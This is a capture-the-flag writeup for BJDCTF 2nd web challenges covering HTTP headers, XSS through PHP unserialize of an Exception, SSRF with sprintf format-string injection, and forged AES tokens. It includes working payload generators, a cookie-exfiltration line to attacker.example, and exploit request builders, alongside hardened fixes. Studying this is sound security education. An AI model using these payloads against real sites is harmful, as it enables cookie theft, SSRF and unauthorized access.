BJDCTF-2nd

[BJDCTF 2nd] web && misc

Writeups

[BJDCTF 2nd]假猪套天下第一

Key point: HTTP protocol

Log in with any account; the returned page contains a hint.

(screenshot: image-20200326150351129)

Then visit the file it points to and, following each of its hints in turn, add the corresponding HTTP request header, one at a time.

(screenshot: image-20200326150549636)

Base64-decode the final output.

[BJDCTF 2nd]Schrödinger

Key point: timestamps

(screenshot: image-20200326153608641)

The challenge hint mentions test.php, so that is the page to brute-force.

(screenshot: image-20200326153713228)

But the rate climbs far too slowly. Capturing the request shows a timestamp in the cookie.

(screenshot: image-20200326153839712)

The timestamp is Base64-encoded (not encrypted), so simply set it to an empty value.

(screenshot: image-20200326154113812)

Then run the check, again with the timestamp emptied.

(screenshot: image-20200326154153026)

Then find the video on bilibili: quantum mechanics... in the comments...

(screenshot: image-20200326154444676)

[BJDCTF 2nd]xss之光

Key points: XSS through a PHP built-in class; .git leak

First, the .git leak gives the source:

```php
<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);   // any class can be instantiated, and its __toString() output is echoed raw
```

Any built-in class whose __toString() reflects attacker input will do; Exception is the obvious choice, since its string form contains the exception message unescaped. The payload uses window.open(document.cookie) to pop the cookie up in a new window:

```php
<?php
// Generate the serialized Exception whose message carries the script.
$a = new Exception("<script>window.open(document.cookie)</script>");
$b = serialize($a);
echo urlencode($b);   // pass the result as ?yds_is_so_beautiful=...
```

(screenshot: image-20200326161508395)
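As an added example (not code from the writeup), the sink above is shown next to a hardened version, together with a hand-built minimal payload: unserialize() does not need every Exception property, only the protected $message, so the serialized object can be written by hand without running PHP's serialize(). The attacker host attacker.example is hypothetical.

```php
<?php
// Added example: the challenge's unserialize() sink versus a hardened handler,
// exercised with a minimal hand-built Exception payload.

// The challenge's sink, reproduced for comparison.
function vulnerable(string $a): string
{
    return (string) unserialize($a);   // Exception::__toString() echoes the message unescaped
}

// Hardened: never instantiate classes from user data, and HTML-encode whatever is printed.
function hardened(string $a): string
{
    $obj = unserialize($a, ['allowed_classes' => false]);
    if ($obj === false || is_object($obj)) {   // objects come back as __PHP_Incomplete_Class
        return 'rejected';
    }
    return htmlspecialchars((string) $obj, ENT_QUOTES, 'UTF-8');
}

// Minimal payload: one protected property, $message, name-mangled as "\0*\0message".
// The s:N: lengths are byte counts, so they are computed with strlen().
function payload(string $js): string
{
    $msg  = "<script>$js</script>";
    $prop = "\0*\0message";
    return sprintf('O:9:"Exception":1:{s:%d:"%s";s:%d:"%s";}',
                   strlen($prop), $prop, strlen($msg), $msg);
}

// attacker.example is a hypothetical collection host.
$p = payload('window.open("//attacker.example/?c=" + document.cookie)');

echo "GET /?yds_is_so_beautiful=" . urlencode($p), "\n\n";
echo "vulnerable: ", vulnerable($p), "\n\n";   // begins with "Exception: <script>..."
echo "hardened:   ", hardened($p), "\n";       // "rejected"
```

The hardened variant is the minimum fix for this sink; the real answer is to not feed untrusted input to unserialize() at all and to exchange data as JSON instead.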

[BJDCTF 2nd]文件探测

Visit robots.txt:

(screenshot: image-20200326170921061)

Then visit index.php:

(screenshot: image-20200326170955058)

```php
<?php
error_reporting(0);
// Gate: the scanner-repelling cookie must equal sha1(md5('y1ng')).
if (!isset($_COOKIE['y1ng']) || $_COOKIE['y1ng'] !== sha1(md5('y1ng'))) {
    echo "<script>alert('why you are here!');alert('fxck your scanner');alert('fxck you! get out!');</script>";
    header("Refresh:0.1;url=index.php");
    die;
}
?>

<?php
$filter1 = '/^http:\/\/127\.0\.0\.1\//i';   // URL must begin with http://127.0.0.1/
$filter2 = '/.?f.?l.?a.?g.?/i';             // URL must not contain "flag", even with a junk character between letters
if (isset($_POST['q1']) && isset($_POST['q2']) && isset($_POST['q3']) ) {
    $url = $_POST['q2'].".y1ng.txt";
    $method = $_POST['q3'];
    $str1 = "~$ python fuck.py -u \"".$url ."\" -M $method -U y1ng -P admin123123 --neglect-negative --debug --hint=xiangdemei<br>";
    echo $str1;
    // $str2, $str3 and $str4 are error messages defined elsewhere in the challenge source (not shown here).
    if (!preg_match($filter1, $url) ) {
        die($str2);
    }
    if (preg_match($filter2, $url)) {
        die($str3);
    }
    if (!preg_match('/^GET/i', $method) && !preg_match('/^POST/i', $method)) {
        die($str4);   // $method only has to START with GET or POST; anything may follow
    }
    $detect = @file_get_contents($url, false);   // SSRF: server-side fetch of an attacker-shaped URL
    // Format-string injection: $method is interpolated into the FORMAT argument of sprintf().
    print(sprintf("$url method&content_size:$method%d", $detect));
}
?>
```

q1 has no constraint.

q2=http://127.0.0.1/admin.php#: $filter1 forces the URL to begin with http://127.0.0.1/, so file_get_contents() cannot be pointed at a local file here and the only option is SSRF against the server itself. The trailing # turns the appended ".y1ng.txt" into a URL fragment, which is not sent with the request, so what is actually fetched is http://127.0.0.1/admin.php ($filter2 rules out anything resembling "flag" in the URL).

q3 only has to begin with GET or POST and is then interpolated straight into sprintf()'s format string, which gives two ways to make sprintf() print the fetched content instead of casting it with %d:

(1) q3=GET%1$s: the positional specifier %1$s prints the first argument (the fetched content) as a string.

(2) q3=GET%s%: %s prints the content, and the trailing % merges with the % of the following %d into %%, a literal percent sign, so %d no longer consumes an argument.

Final request body (when sending it as a form body, encode # as %23 and % as %25 so the server receives them literally):

```
q1=a&q2=http://127.0.0.1/admin.php#&q3=GET%1$s
```
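The following is an added example, not code from the writeup, that runs the sprintf() sink from index.php with a plain method string and with both bypass payloads. $detect stands in for the body that file_get_contents() fetched from the internal URL; its value here is a constructed sample.

```php
<?php
// Added example: the format-string sink from index.php, exercised with the three q3 values.
function leak(string $method, string $detect): string
{
    $url = 'http://127.0.0.1/admin.php#.y1ng.txt';
    // Same shape as the challenge: $method lands inside the FORMAT string,
    // $detect is the only real argument.
    return sprintf("$url method&content_size:$method%d", $detect);
}

// Constructed stand-in for the admin.php source the server fetched.
$detect = "const SECRET = 'constructed sample admin.php body';";

// Plain method: %d casts the body to an integer (0 for non-numeric text), so nothing leaks.
echo leak('GET', $detect), "\n";

// Bypass 1: %1$s is a positional specifier that prints argument 1 verbatim; the body leaks.
echo leak('GET%1$s', $detect), "\n";

// Bypass 2: %s prints the body, and the trailing % merges with the % of %d into "%%",
// a literal percent sign, so "%d" is emitted as text and consumes no argument.
echo leak('GET%s%', $detect), "\n";
```

The fix is the usual one for format-string bugs: user input must only ever be passed as an argument, never as part of the format, e.g. sprintf("%s method&content_size:%s%d", $url, $method, $detect).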
```php
<?php
error_reporting(0);
session_start();
$f1ag = 'f1ag{s1mpl3_SSRF_@nd_spr1ntf}'; //fake

// AES-128-CBC with a 4-byte key (PHP zero-pads short keys to the cipher's key size)
// and an IV derived from the client's own address: every input is known to the client.
function aesEn($data, $key)
{
    $method = 'AES-128-CBC';
    $iv = md5($_SERVER['REMOTE_ADDR'],true);
    return base64_encode(openssl_encrypt($data, $method,$key, OPENSSL_RAW_DATA , $iv));
}

// Both cookies are derived from values the client knows.
function Check()
{
    if (isset($_COOKIE['your_ip_address']) && $_COOKIE['your_ip_address'] === md5($_SERVER['REMOTE_ADDR']) && $_COOKIE['y1ng'] === sha1(md5('y1ng')))
        return true;
    else
        return false;
}

// The source is only shown to 127.0.0.1, hence the SSRF through index.php;
// the rest of the script still runs for every client.
if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
    highlight_file(__FILE__);
} else {
    echo "<head><title>403 Forbidden</title></head><body bgcolor=black><center><font size='10px' color=white><br>only 127.0.0.1 can access! You know what I mean right?<br>your ip address is " . $_SERVER['REMOTE_ADDR'];
}


$_SESSION['user'] = md5($_SERVER['REMOTE_ADDR']);

if (isset($_GET['decrypt'])) {
    $decr = $_GET['decrypt'];
    if (Check()){
        $data = $_SESSION['secret'];   // NULL for a fresh session: this branch never sets it
        include 'flag_2sln2ndln2klnlksnf.php';
        $cipher = aesEn($data, 'y1ng');
        if ($decr === $cipher){
            echo WHAT_YOU_WANT;
        } else {
            die('爬');   // "get lost"
        }
    } else{
        header("Refresh:0.1;url=index.php");
    }
} else {
    //I heard you can break PHP mt_rand seed
    mt_srand(rand(0,9999999));
    $length = mt_rand(40,80);
    $_SESSION['secret'] = bin2hex(random_bytes($length));   // only set when ?decrypt is absent
}

?>
```

The key code:

```php
$data = $_SESSION['secret'];
$cipher = aesEn($data, 'y1ng');
```

We need $decr === $cipher. If the session carries no secret, then $data = $_SESSION['secret'] = NULL and $cipher = aesEn(NULL, 'y1ng'): the encryption of an empty string under a fixed key and an IV derived only from our own REMOTE_ADDR. Both are known to us, so $cipher can be computed offline and supplied as $decr = $_GET['decrypt'].

```php
<?php
// Reproduces the server's aesEn() with REMOTE_ADDR replaced by our own public IP,
// exactly as the server sees it (it prints it on the 403 page).
function aesEn($data, $key)
{
    $remote= '174.0.222.75';
    $method = 'AES-128-CBC';
    $iv = md5($remote,true);
    return base64_encode(openssl_encrypt($data, $method,$key, OPENSSL_RAW_DATA , $iv));
}

// Empty plaintext: the result is a single CBC block consisting purely of PKCS#7 padding.
echo aesEn("","y1ng");
```

Output (for that IP; it differs for every client address):

```
70klfZeYC+WlC045CcKhtg==
```

Then make the request with the PHPSESSID cookie deleted (a fresh session has no secret), the y1ng and your_ip_address cookies set as Check() demands, and decrypt= set to the value above, URL-encoded (its + would otherwise be decoded as a space and the strict comparison would fail).
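Added example (not the writeup's own script) that assembles the complete final request from the checks in admin.php: the decrypt token, the two cookies Check() requires, and the percent-encoded query string. $ip must be the address the server printed on its 403 page; 174.0.222.75 is the one used in this writeup, and the host name challenge.example is a placeholder.

```php
<?php
// Added example: build the whole exploit request for admin.php from its own checks.
function make_request(string $ip, string $host = 'challenge.example'): array
{
    // Server-side aesEn() with $_SERVER['REMOTE_ADDR'] replaced by $ip. With no
    // PHPSESSID cookie the session is fresh, $_SESSION['secret'] is NULL and the
    // plaintext is "", so the ciphertext is one block of PKCS#7 padding. PHP
    // zero-pads the 4-byte key 'y1ng' to the 16 bytes AES-128 needs.
    $iv    = md5($ip, true);
    $token = base64_encode(openssl_encrypt('', 'AES-128-CBC', 'y1ng', OPENSSL_RAW_DATA, $iv));

    // Cookies required by the index.php gate and by Check(); deliberately no PHPSESSID.
    $cookies = [
        'y1ng'            => sha1(md5('y1ng')),
        'your_ip_address' => md5($ip),
    ];
    $pairs = [];
    foreach ($cookies as $k => $v) {
        $pairs[] = "$k=$v";
    }

    // The token contains '+' and '='. Sent raw in a query string, '+' is decoded as a
    // space and $decr === $cipher fails, so it has to be percent-encoded.
    $url = "http://$host/admin.php?decrypt=" . urlencode($token);

    return ['token' => $token, 'cookie' => implode('; ', $pairs), 'url' => $url];
}

$r = make_request('174.0.222.75');   // the writeup author's address; use your own
echo "token:  {$r['token']}\n";
echo "curl -s -b '{$r['cookie']}' '{$r['url']}'\n";
```

If a proxy or load balancer sits in front of the challenge, REMOTE_ADDR is whatever that hop reports, which is why the address echoed on the 403 page, not your own idea of your public IP, is the one to feed in.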

(screenshot: image-20200326213049661)

Author: 我是小吴啦
Link: http://yoursite.com/2020/03/20/BJDCTF-2nd/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.